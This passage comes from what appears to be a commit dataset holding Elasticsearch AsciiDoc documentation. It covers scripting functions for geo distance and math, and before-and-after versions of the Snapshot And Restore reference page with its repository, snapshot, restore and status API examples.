of a geo point type.\n\n|`doc['field_name'].distance(lat, lon)` |The `plane` distance (in meters)\nof this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].distanceWithDefault(lat, lon, default)` |The `plane` distance (in meters)\nof this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].distanceInMiles(lat, lon)` |The `plane` distance (in\nmiles) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].distanceInMilesWithDefault(lat, lon, default)` |The `plane` distance (in\nmiles) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].distanceInKm(lat, lon)` |The `plane` distance (in\nkm) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].distanceInKmWithDefault(lat, lon, default)` |The `plane` distance (in\nkm) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].arcDistance(lat, lon)` |The `arc` distance (in\nmeters) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].arcDistanceWithDefault(lat, lon, default)` |The `arc` distance (in\nmeters) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].arcDistanceInMiles(lat, lon)` |The `arc` distance (in\nmiles) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].arcDistanceInMilesWithDefault(lat, lon, default)` |The `arc` distance (in\nmiles) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].arcDistanceInKm(lat, lon)` |The `arc` distance (in\nkm) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].arcDistanceInKmWithDefault(lat, lon, default)` |The `arc` distance (in\nkm) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].factorDistance(lat, lon)` |The distance factor of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].factorDistance(lat, lon, default)` |The distance factor of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].geohashDistance(geohash)` |The `arc` distance (in meters)\nof this geo point field from the provided geohash.\n\n|`doc['field_name'].geohashDistanceInKm(geohash)` |The `arc` distance (in km)\nof this geo point field from the provided geohash.\n\n|`doc['field_name'].geohashDistanceInMiles(geohash)` |The `arc` distance (in\nmiles) of this geo point field from the provided geohash.\n|=======================================================================\n\n[float]\n=== Stored Fields\n\nStored fields can also be accessed when executing a script. Note, they\nare much slower to access compared with document fields, but are not\nloaded into memory. They can be simply accessed using\n`_fields['my_field_name'].value` or `_fields['my_field_name'].values`.\n\n[float]\n=== Source Field\n\nThe source field can also be accessed when executing a script. The\nsource field is loaded per doc, parsed, and then provided to the script\nfor evaluation. The `_source` forms the context under which the source\nfield can be accessed, for example `_source.obj2.obj1.field3`.\n\nAccessing `_source` is much slower compared to using `_doc`\nbut the data is not loaded into memory. For a single field access `_fields` may be\nfaster than using `_source` due to the extra overhead of potentially parsing large documents.\nHowever, `_source` may be faster if you access multiple fields or if the source has already been\nloaded for other purposes.\n\n\n[float]\n=== mvel Built In Functions\n\nThere are several built in functions that can be used within scripts.\nThey include:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Function |Description\n|`time()` |The current time in milliseconds.\n\n|`sin(a)` |Returns the trigonometric sine of an angle.\n\n|`cos(a)` |Returns the trigonometric cosine of an angle.\n\n|`tan(a)` |Returns the trigonometric tangent of an angle.\n\n|`asin(a)` |Returns the arc sine of a value.\n\n|`acos(a)` |Returns the arc cosine of a value.\n\n|`atan(a)` |Returns the arc tangent of a value.\n\n|`toRadians(angdeg)` |Converts an angle measured in degrees to an\napproximately equivalent angle measured in radians\n\n|`toDegrees(angrad)` |Converts an angle measured in radians to an\napproximately equivalent angle measured in degrees.\n\n|`exp(a)` |Returns Euler's number _e_ raised to the power of value.\n\n|`log(a)` |Returns the natural logarithm (base _e_) of a value.\n\n|`log10(a)` |Returns the base 10 logarithm of a value.\n\n|`sqrt(a)` |Returns the correctly rounded positive square root of a\nvalue.\n\n|`cbrt(a)` |Returns the cube root of a double value.\n\n|`IEEEremainder(f1, f2)` |Computes the remainder operation on two\narguments as prescribed by the IEEE 754 standard.\n\n|`ceil(a)` |Returns the smallest (closest to negative infinity) value\nthat is greater than or equal to the argument and is equal to a\nmathematical integer.\n\n|`floor(a)` |Returns the largest (closest to positive infinity) value\nthat is less than or equal to the argument and is equal to a\nmathematical integer.\n\n|`rint(a)` |Returns the value that is closest in value to the argument\nand is equal to a mathematical integer.\n\n|`atan2(y, x)` |Returns the angle _theta_ from the conversion of\nrectangular coordinates (_x_, _y_) to polar coordinates (r,_theta_).\n\n|`pow(a, b)` |Returns the value of the first argument raised to the\npower of the second argument.\n\n|`round(a)` |Returns the closest _int_ to the argument.\n\n|`random()` |Returns a random _double_ value.\n\n|`abs(a)` |Returns the absolute value of a value.\n\n|`max(a, b)` |Returns the greater of two values.\n\n|`min(a, b)` |Returns the smaller of two values.\n\n|`ulp(d)` |Returns the size of an ulp of the argument.\n\n|`signum(d)` |Returns the signum function of the argument.\n\n|`sinh(x)` |Returns the hyperbolic sine of a value.\n\n|`cosh(x)` |Returns the hyperbolic cosine of a value.\n\n|`tanh(x)` |Returns the hyperbolic tangent of a value.\n\n|`hypot(x, y)` |Returns sqrt(_x2_ + _y2_) without intermediate overflow\nor underflow.\n|=======================================================================\n\n[float]\n=== Arithmetic precision in MVEL\n\nWhen dividing two numbers using MVEL based scripts, the engine tries to\nbe smart and adheres to the default behaviour of java. This means if you\ndivide two integers (you might have configured the fields as integer in\nthe mapping), the result will also be an integer. This means, if a\ncalculation like `1\/num` is happening in your scripts and `num` is an\ninteger with the value of `8`, the result is `0` even though you were\nexpecting it to be `0.125`. You may need to enforce precision by\nexplicitly using a double like `1.0\/num` in order to get the expected\nresult.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"450b0233827f3423648b35e295102cce9b1bc5f1","subject":"Fixed references to Multi Index Syntax (#27283)","message":"Fixed references to Multi Index Syntax (#27283)\n\n","repos":"vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elasticassandra,strapdata\/elassandra,vroyer\/elasticassandra,vroyer\/elassandra,vroyer\/elasticassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/modules\/snapshots.asciidoc","new_file":"docs\/reference\/modules\/snapshots.asciidoc","new_contents":"[[modules-snapshots]]\n== Snapshot And Restore\n\nYou can store snapshots of individual indices or an entire cluster in\na remote repository like a shared file system, S3, or HDFS. These snapshots\nare great for backups because they can be restored relatively quickly. However,\nsnapshots can only be restored to versions of Elasticsearch that can read the\nindices:\n\n* A snapshot of an index created in 5.x can be restored to 6.x.\n* A snapshot of an index created in 2.x can be restored to 5.x.\n* A snapshot of an index created in 1.x can be restored to 2.x.\n\nConversely, snapshots of indices created in 1.x **cannot** be restored to\n5.x or 6.x, and snapshots of indices created in 2.x **cannot** be restored\nto 6.x.\n\nSnapshots are incremental and can contain indices created in various\nversions of Elasticsearch. If any indices in a snapshot were created in an\nincompatible version, you will not be able restore the snapshot.\n\nIMPORTANT: When backing up your data prior to an upgrade, keep in mind that you\nwon't be able to restore snapshots after you upgrade if they contain indices\ncreated in a version that's incompatible with the upgrade version.\n\nIf you end up in a situation where you need to restore a snapshot of an index\nthat is incompatible with the version of the cluster you are currently running,\nyou can restore it on the latest compatible version and use\n<<reindex-from-remote,reindex-from-remote>> to rebuild the index on the current\nversion. Reindexing from remote is only possible if the original index has\nsource enabled. Retrieving and reindexing the data can take significantly longer\nthan simply restoring a snapshot. If you have a large amount of data, we\nrecommend testing the reindex from remote process with a subset of your data to\nunderstand the time requirements before proceeding.\n\n[float]\n=== Repositories\n\nYou must register a snapshot repository before you can perform snapshot and\nrestore operations. We recommend creating a new snapshot repository for each\nmajor version. The valid repository settings depend on the repository type.\n\nIf you register same snapshot repository with multiple clusters, only\none cluster should have write access to the repository. All other clusters\nconnected to that repository should set the repository to `readonly` mode.\n\nNOTE: The snapshot format can change across major versions, so if you have\nclusters on different major versions trying to write the same repository,\nnew snapshots written by one version will not be visible to the other. While\nsetting the repository to `readonly` on all but one of the clusters should work\nwith multiple clusters differing by one major version, it is not a supported\nconfiguration.\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_backup_location\"\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TESTSETUP\n\nTo retrieve information about a registered repository, use a GET request:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/my_backup\n-----------------------------------\n\/\/ CONSOLE\n\nwhich returns:\n\n[source,js]\n-----------------------------------\n{\n \"my_backup\": {\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_backup_location\"\n }\n }\n}\n-----------------------------------\n\/\/ TESTRESPONSE\n\nTo retrieve information about multiple repositories, specify a\na comma-delimited list of repositories. You can also use the * wildcard when\nspecifying repository names. For example, the following request retrieves\ninformation about all of the snapshot repositories that start with `repo` or\ncontain `backup`:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/repo*,*backup*\n-----------------------------------\n\/\/ CONSOLE\n\nTo retrieve information about all registered snapshot repositories, omit the\nrepository name or specify `_all`:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\n-----------------------------------\n\/\/ CONSOLE\n\nor\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/_all\n-----------------------------------\n\/\/ CONSOLE\n\n[float]\n===== Shared File System Repository\n\nThe shared file system repository (`\"type\": \"fs\"`) uses the shared file system to store snapshots. In order to register\nthe shared file system repository it is necessary to mount the same shared filesystem to the same location on all\nmaster and data nodes. This location (or one of its parent directories) must be registered in the `path.repo`\nsetting on all master and data nodes.\n\nAssuming that the shared filesystem is mounted to `\/mount\/backups\/my_backup`, the following setting should be added to\n`elasticsearch.yml` file:\n\n[source,yaml]\n--------------\npath.repo: [\"\/mount\/backups\", \"\/mount\/longterm_backups\"]\n--------------\n\nThe `path.repo` setting supports Microsoft Windows UNC paths as long as at least server name and share are specified as\na prefix and back slashes are properly escaped:\n\n[source,yaml]\n--------------\npath.repo: [\"\\\\\\\\MY_SERVER\\\\Snapshots\"]\n--------------\n\nAfter all nodes are restarted, the following command can be used to register the shared file system repository with\nthe name `my_backup`:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_fs_backup\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"\/mount\/backups\/my_fs_backup_location\",\n \"compress\": true\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[skip:no access to absolute path]\n\nIf the repository location is specified as a relative path this path will be resolved against the first path specified\nin `path.repo`:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_fs_backup\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_fs_backup_location\",\n \"compress\": true\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe following settings are supported:\n\n[horizontal]\n`location`:: Location of the snapshots. Mandatory.\n`compress`:: Turns on compression of the snapshot files. Compression is applied only to metadata files (index mapping and settings). Data files are not compressed. Defaults to `true`.\n`chunk_size`:: Big files can be broken down into chunks during snapshotting if needed. The chunk size can be specified in bytes or by\n using size value notation, i.e. 1g, 10m, 5k. Defaults to `null` (unlimited chunk size).\n`max_restore_bytes_per_sec`:: Throttles per node restore rate. Defaults to `40mb` per second.\n`max_snapshot_bytes_per_sec`:: Throttles per node snapshot rate. Defaults to `40mb` per second.\n`readonly`:: Makes repository read-only. Defaults to `false`.\n\n[float]\n===== Read-only URL Repository\n\nThe URL repository (`\"type\": \"url\"`) can be used as an alternative read-only way to access data created by the shared file\nsystem repository. The URL specified in the `url` parameter should point to the root of the shared filesystem repository.\nThe following settings are supported:\n\n[horizontal]\n`url`:: Location of the snapshots. Mandatory.\n\nURL Repository supports the following protocols: \"http\", \"https\", \"ftp\", \"file\" and \"jar\". URL repositories with `http:`,\n`https:`, and `ftp:` URLs has to be whitelisted by specifying allowed URLs in the `repositories.url.allowed_urls` setting.\nThis setting supports wildcards in the place of host, path, query, and fragment. For example:\n\n[source,yaml]\n-----------------------------------\nrepositories.url.allowed_urls: [\"http:\/\/www.example.org\/root\/*\", \"https:\/\/*.mydomain.com\/*?*#*\"]\n-----------------------------------\n\nURL repositories with `file:` URLs can only point to locations registered in the `path.repo` setting similar to\nshared file system repository.\n\n[float]\n===== Repository plugins\n\nOther repository backends are available in these official plugins:\n\n* {plugins}\/repository-s3.html[repository-s3] for S3 repository support\n* {plugins}\/repository-hdfs.html[repository-hdfs] for HDFS repository support in Hadoop environments\n* {plugins}\/repository-azure.html[repository-azure] for Azure storage repositories\n* {plugins}\/repository-gcs.html[repository-gcs] for Google Cloud Storage repositories\n\n[float]\n===== Repository Verification\nWhen a repository is registered, it's immediately verified on all master and data nodes to make sure that it is functional\non all nodes currently present in the cluster. The `verify` parameter can be used to explicitly disable the repository\nverification when registering or updating a repository:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_unverified_backup?verify=false\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_unverified_backup_location\"\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe verification process can also be executed manually by running the following command:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_unverified_backup\/_verify\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nIt returns a list of nodes where repository was successfully verified or an error message if verification process failed.\n\n[float]\n=== Snapshot\n\nA repository can contain multiple snapshots of the same cluster. Snapshots are identified by unique names within the\ncluster. A snapshot with the name `snapshot_1` in the repository `my_backup` can be created by executing the following\ncommand:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\/snapshot_1?wait_for_completion=true\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe `wait_for_completion` parameter specifies whether or not the request should return immediately after snapshot\ninitialization (default) or wait for snapshot completion. During snapshot initialization, information about all\nprevious snapshots is loaded into the memory, which means that in large repositories it may take several seconds (or\neven minutes) for this command to return even if the `wait_for_completion` parameter is set to `false`.\n\nBy default a snapshot of all open and started indices in the cluster is created. This behavior can be changed by\nspecifying the list of indices in the body of the snapshot request.\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\/snapshot_2?wait_for_completion=true\n{\n \"indices\": \"index_1,index_2\",\n \"ignore_unavailable\": true,\n \"include_global_state\": false\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe list of indices that should be included into the snapshot can be specified using the `indices` parameter that\nsupports <<multi-index,multi index syntax>>. The snapshot request also supports the\n`ignore_unavailable` option. Setting it to `true` will cause indices that do not exist to be ignored during snapshot\ncreation. By default, when `ignore_unavailable` option is not set and an index is missing the snapshot request will fail.\nBy setting `include_global_state` to false it's possible to prevent the cluster global state to be stored as part of\nthe snapshot. By default, the entire snapshot will fail if one or more indices participating in the snapshot don't have\nall primary shards available. This behaviour can be changed by setting `partial` to `true`.\n\nThe index snapshot process is incremental. In the process of making the index snapshot Elasticsearch analyses\nthe list of the index files that are already stored in the repository and copies only files that were created or\nchanged since the last snapshot. That allows multiple snapshots to be preserved in the repository in a compact form.\nSnapshotting process is executed in non-blocking fashion. All indexing and searching operation can continue to be\nexecuted against the index that is being snapshotted. However, a snapshot represents the point-in-time view of the index\nat the moment when snapshot was created, so no records that were added to the index after the snapshot process was started\nwill be present in the snapshot. The snapshot process starts immediately for the primary shards that has been started\nand are not relocating at the moment. Before version 1.2.0, the snapshot operation fails if the cluster has any relocating or\ninitializing primaries of indices participating in the snapshot. Starting with version 1.2.0, Elasticsearch waits for\nrelocation or initialization of shards to complete before snapshotting them.\n\nBesides creating a copy of each index the snapshot process can also store global cluster metadata, which includes persistent\ncluster settings and templates. The transient settings and registered snapshot repositories are not stored as part of\nthe snapshot.\n\nOnly one snapshot process can be executed in the cluster at any time. While snapshot of a particular shard is being\ncreated this shard cannot be moved to another node, which can interfere with rebalancing process and allocation\nfiltering. Elasticsearch will only be able to move a shard to another node (according to the current allocation\nfiltering settings and rebalancing algorithm) once the snapshot is finished.\n\nOnce a snapshot is created information about this snapshot can be obtained using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThis command returns basic information about the snapshot including start and end time, version of\nelasticsearch that created the snapshot, the list of included indices, the current state of the\nsnapshot and the list of failures that occurred during the snapshot. The snapshot `state` can be\n\n[horizontal]\n`IN_PROGRESS`::\n\n The snapshot is currently running.\n\n`SUCCESS`::\n\n The snapshot finished and all shards were stored successfully.\n\n`FAILED`::\n\n The snapshot finished with an error and failed to store any data.\n\n`PARTIAL`::\n\n The global cluster state was stored, but data of at least one shard wasn't stored successfully.\n The `failure` section in this case should contain more detailed information about shards\n that were not processed correctly.\n\n`INCOMPATIBLE`::\n\n The snapshot was created with an old version of elasticsearch and therefore is incompatible with\n the current version of the cluster.\n\n\nSimilar as for repositories, information about multiple snapshots can be queried in one go, supporting wildcards as well:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_*,some_other_snapshot\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nAll snapshots currently stored in the repository can be listed using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_all\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe command fails if some of the snapshots are unavailable. The boolean parameter `ignore_unavailable` can be used to\nreturn all snapshots that are currently available.\n\nGetting all snapshots in the repository can be costly on cloud-based repositories,\nboth from a cost and performance perspective. If the only information required is\nthe snapshot names\/uuids in the repository and the indices in each snapshot, then\nthe optional boolean parameter `verbose` can be set to `false` to execute a more\nperformant and cost-effective retrieval of the snapshots in the repository. Note\nthat setting `verbose` to `false` will omit all other information about the snapshot\nsuch as status information, the number of snapshotted shards, etc. The default\nvalue of the `verbose` parameter is `true`.\n\nA currently running snapshot can be retrieved using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_current\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nA snapshot can be deleted from the repository using the following command:\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\/snapshot_2\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nWhen a snapshot is deleted from a repository, Elasticsearch deletes all files that are associated with the deleted\nsnapshot and not used by any other snapshots. If the deleted snapshot operation is executed while the snapshot is being\ncreated the snapshotting process will be aborted and all files created as part of the snapshotting process will be\ncleaned. Therefore, the delete snapshot operation can be used to cancel long running snapshot operations that were\nstarted by mistake.\n\nA repository can be deleted using the following command:\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_fs_backup\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nWhen a repository is deleted, Elasticsearch only removes the reference to the location where the repository is storing\nthe snapshots. The snapshots themselves are left untouched and in place.\n\n[float]\n=== Restore\n\nA snapshot can be restored using the following command:\n\n[source,sh]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nBy default, all indices in the snapshot are restored, and the cluster state is\n*not* restored. It's possible to select indices that should be restored as well\nas to allow the global cluster state from being restored by using `indices` and\n`include_global_state` options in the restore request body. The list of indices\nsupports <<multi-index,multi index syntax>>. The `rename_pattern`\nand `rename_replacement` options can be also used to rename indices on restore\nusing regular expression that supports referencing the original text as\nexplained\nhttp:\/\/docs.oracle.com\/javase\/6\/docs\/api\/java\/util\/regex\/Matcher.html#appendReplacement(java.lang.StringBuffer,%20java.lang.String)[here].\nSet `include_aliases` to `false` to prevent aliases from being restored together\nwith associated indices\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n \"indices\": \"index_1,index_2\",\n \"ignore_unavailable\": true,\n \"include_global_state\": true,\n \"rename_pattern\": \"index_(.+)\",\n \"rename_replacement\": \"restored_index_$1\"\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe restore operation can be performed on a functioning cluster. However, an\nexisting index can be only restored if it's <<indices-open-close,closed>> and\nhas the same number of shards as the index in the snapshot. The restore\noperation automatically opens restored indices if they were closed and creates\nnew indices if they didn't exist in the cluster. If cluster state is restored\nwith `include_global_state` (defaults to `false`), the restored templates that\ndon't currently exist in the cluster are added and existing templates with the\nsame name are replaced by the restored templates. The restored persistent\nsettings are added to the existing persistent settings.\n\n[float]\n==== Partial restore\n\nBy default, the entire restore operation will fail if one or more indices participating in the operation don't have\nsnapshots of all shards available. It can occur if some shards failed to snapshot for example. It is still possible to\nrestore such indices by setting `partial` to `true`. Please note, that only successfully snapshotted shards will be\nrestored in this case and all missing shards will be recreated empty.\n\n\n[float]\n==== Changing index settings during restore\n\nMost of index settings can be overridden during the restore process. For example, the following command will restore\nthe index `index_1` without creating any replicas while switching back to default refresh interval:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n \"indices\": \"index_1\",\n \"index_settings\": {\n \"index.number_of_replicas\": 0\n },\n \"ignore_index_settings\": [\n \"index.refresh_interval\"\n ]\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nPlease note, that some settings such as `index.number_of_shards` cannot be changed during restore operation.\n\n[float]\n==== Restoring to a different cluster\n\nThe information stored in a snapshot is not tied to a particular cluster or a cluster name. Therefore it's possible to\nrestore a snapshot made from one cluster into another cluster. All that is required is registering the repository\ncontaining the snapshot in the new cluster and starting the restore process. The new cluster doesn't have to have the\nsame size or topology. However, the version of the new cluster should be the same or newer (only 1 major version newer) than the cluster that was used to create the snapshot. For example, you can restore a 1.x snapshot to a 2.x cluster, but not a 1.x snapshot to a 5.x cluster.\n\nIf the new cluster has a smaller size additional considerations should be made. First of all it's necessary to make sure\nthat new cluster have enough capacity to store all indices in the snapshot. It's possible to change indices settings\nduring restore to reduce the number of replicas, which can help with restoring snapshots into smaller cluster. It's also\npossible to select only subset of the indices using the `indices` parameter.\n\nIf indices in the original cluster were assigned to particular nodes using\n<<shard-allocation-filtering,shard allocation filtering>>, the same rules will be enforced in the new cluster. Therefore\nif the new cluster doesn't contain nodes with appropriate attributes that a restored index can be allocated on, such\nindex will not be successfully restored unless these index allocation settings are changed during restore operation.\n\nThe restore operation also checks that restored persistent settings are compatible with the current cluster to avoid accidentally\nrestoring an incompatible settings such as `discovery.zen.minimum_master_nodes` and as a result disable a smaller cluster until the\nrequired number of master eligible nodes is added. If you need to restore a snapshot with incompatible persistent settings, try\nrestoring it without the global cluster state.\n\n[float]\n=== Snapshot status\n\nA list of currently running snapshots with their detailed status information can be obtained using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nIn this format, the command will return information about all currently running snapshots. By specifying a repository name, it's possible\nto limit the results to a particular repository:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nIf both repository name and snapshot id are specified, this command will return detailed status information for the given snapshot even\nif it's not currently running:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nMultiple ids are also supported:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1,snapshot_2\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n[float]\n=== Monitoring snapshot\/restore progress\n\nThere are several ways to monitor the progress of the snapshot and restores processes while they are running. Both\noperations support `wait_for_completion` parameter that would block client until the operation is completed. This is\nthe simplest method that can be used to get notified about operation completion.\n\nThe snapshot operation can be also monitored by periodic calls to the snapshot info:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nPlease note that snapshot info operation uses the same resources and thread pool as the snapshot operation. So,\nexecuting a snapshot info operation while large shards are being snapshotted can cause the snapshot info operation to wait\nfor available resources before returning the result. On very large shards the wait time can be significant.\n\nTo get more immediate and complete information about snapshots the snapshot status command can be used instead:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nWhile snapshot info method returns only basic information about the snapshot in progress, the snapshot status returns\ncomplete breakdown of the current state for each shard participating in the snapshot.\n\nThe restore process piggybacks on the standard recovery mechanism of the Elasticsearch. As a result, standard recovery\nmonitoring services can be used to monitor the state of restore. When restore operation is executed the cluster\ntypically goes into `red` state. It happens because the restore operation starts with \"recovering\" primary shards of the\nrestored indices. During this operation the primary shards become unavailable which manifests itself in the `red` cluster\nstate. Once recovery of primary shards is completed Elasticsearch is switching to standard replication process that\ncreates the required number of replicas at this moment cluster switches to the `yellow` state. Once all required replicas\nare created, the cluster switches to the `green` states.\n\nThe cluster health operation provides only a high level status of the restore process. It's possible to get more\ndetailed insight into the current state of the recovery process by using <<indices-recovery, indices recovery>> and\n<<cat-recovery, cat recovery>> APIs.\n\n[float]\n=== Stopping currently running snapshot and restore operations\n\nThe snapshot and restore framework allows running only one snapshot or one restore operation at a time. If a currently\nrunning snapshot was executed by mistake, or takes unusually long, it can be terminated using the snapshot delete operation.\nThe snapshot delete operation checks if the deleted snapshot is currently running and if it does, the delete operation stops\nthat snapshot before deleting the snapshot data from the repository.\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe restore operation uses the standard shard recovery mechanism. Therefore, any currently running restore operation can\nbe canceled by deleting indices that are being restored. Please note that data for all deleted indices will be removed\nfrom the cluster as a result of this operation.\n\n[float]\n=== Effect of cluster blocks on snapshot and restore operations\nMany snapshot and restore operations are affected by cluster and index blocks. For example, registering and unregistering\nrepositories require write global metadata access. The snapshot operation requires that all indices and their metadata as\nwell as the global metadata were readable. The restore operation requires the global metadata to be writable, however\nthe index level blocks are ignored during restore because indices are essentially recreated during restore.\nPlease note that a repository content is not part of the cluster and therefore cluster blocks don't affect internal\nrepository operations such as listing or deleting snapshots from an already registered repository.\n","old_contents":"[[modules-snapshots]]\n== Snapshot And Restore\n\nYou can store snapshots of individual indices or an entire cluster in\na remote repository like a shared file system, S3, or HDFS. These snapshots\nare great for backups because they can be restored relatively quickly. However,\nsnapshots can only be restored to versions of Elasticsearch that can read the\nindices:\n\n* A snapshot of an index created in 5.x can be restored to 6.x.\n* A snapshot of an index created in 2.x can be restored to 5.x.\n* A snapshot of an index created in 1.x can be restored to 2.x.\n\nConversely, snapshots of indices created in 1.x **cannot** be restored to\n5.x or 6.x, and snapshots of indices created in 2.x **cannot** be restored\nto 6.x.\n\nSnapshots are incremental and can contain indices created in various\nversions of Elasticsearch. If any indices in a snapshot were created in an\nincompatible version, you will not be able restore the snapshot.\n\nIMPORTANT: When backing up your data prior to an upgrade, keep in mind that you\nwon't be able to restore snapshots after you upgrade if they contain indices\ncreated in a version that's incompatible with the upgrade version.\n\nIf you end up in a situation where you need to restore a snapshot of an index\nthat is incompatible with the version of the cluster you are currently running,\nyou can restore it on the latest compatible version and use\n<<reindex-from-remote,reindex-from-remote>> to rebuild the index on the current\nversion. Reindexing from remote is only possible if the original index has\nsource enabled. Retrieving and reindexing the data can take significantly longer\nthan simply restoring a snapshot. If you have a large amount of data, we\nrecommend testing the reindex from remote process with a subset of your data to\nunderstand the time requirements before proceeding.\n\n[float]\n=== Repositories\n\nYou must register a snapshot repository before you can perform snapshot and\nrestore operations. We recommend creating a new snapshot repository for each\nmajor version. The valid repository settings depend on the repository type.\n\nIf you register same snapshot repository with multiple clusters, only\none cluster should have write access to the repository. All other clusters\nconnected to that repository should set the repository to `readonly` mode.\n\nNOTE: The snapshot format can change across major versions, so if you have\nclusters on different major versions trying to write the same repository,\nnew snapshots written by one version will not be visible to the other. While\nsetting the repository to `readonly` on all but one of the clusters should work\nwith multiple clusters differing by one major version, it is not a supported\nconfiguration.\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_backup_location\"\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TESTSETUP\n\nTo retrieve information about a registered repository, use a GET request:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/my_backup\n-----------------------------------\n\/\/ CONSOLE\n\nwhich returns:\n\n[source,js]\n-----------------------------------\n{\n \"my_backup\": {\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_backup_location\"\n }\n }\n}\n-----------------------------------\n\/\/ TESTRESPONSE\n\nTo retrieve information about multiple repositories, specify a\na comma-delimited list of repositories. You can also use the * wildcard when\nspecifying repository names. For example, the following request retrieves\ninformation about all of the snapshot repositories that start with `repo` or\ncontain `backup`:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/repo*,*backup*\n-----------------------------------\n\/\/ CONSOLE\n\nTo retrieve information about all registered snapshot repositories, omit the\nrepository name or specify `_all`:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\n-----------------------------------\n\/\/ CONSOLE\n\nor\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/_all\n-----------------------------------\n\/\/ CONSOLE\n\n[float]\n===== Shared File System Repository\n\nThe shared file system repository (`\"type\": \"fs\"`) uses the shared file system to store snapshots. In order to register\nthe 